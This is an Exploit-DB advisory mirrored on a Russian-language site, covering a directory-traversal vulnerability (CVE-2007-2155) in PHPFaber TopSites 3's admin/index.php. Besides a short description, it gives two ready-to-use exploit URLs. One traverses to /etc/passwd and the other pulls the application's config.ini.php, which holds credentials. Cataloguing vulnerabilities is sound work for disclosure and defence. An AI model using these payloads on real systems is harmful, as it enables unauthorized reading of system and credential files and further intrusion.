- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 29841
- Проверка EDB
-
- Пройдено
- Автор
- DR.ROVER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-2155
- Дата публикации
- 2007-04-11
PHPFaber TopSites 3 - 'admin/index.php' Directory Traversal
Код:
source: https://www.securityfocus.com/bid/23419/info
TopSites is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the webserver process. Information obtained may aid in further attacks.
This issue affects TopSites 3; other versions may also be vulnerable.
http://www.example.com/Path/admin/index.php?page=template&modify=../../../../../../etc/passwd
http://www.example.com/Path/admin/index.php?page=template&modify=inc/config.ini.php
- Источник
- www.exploit-db.com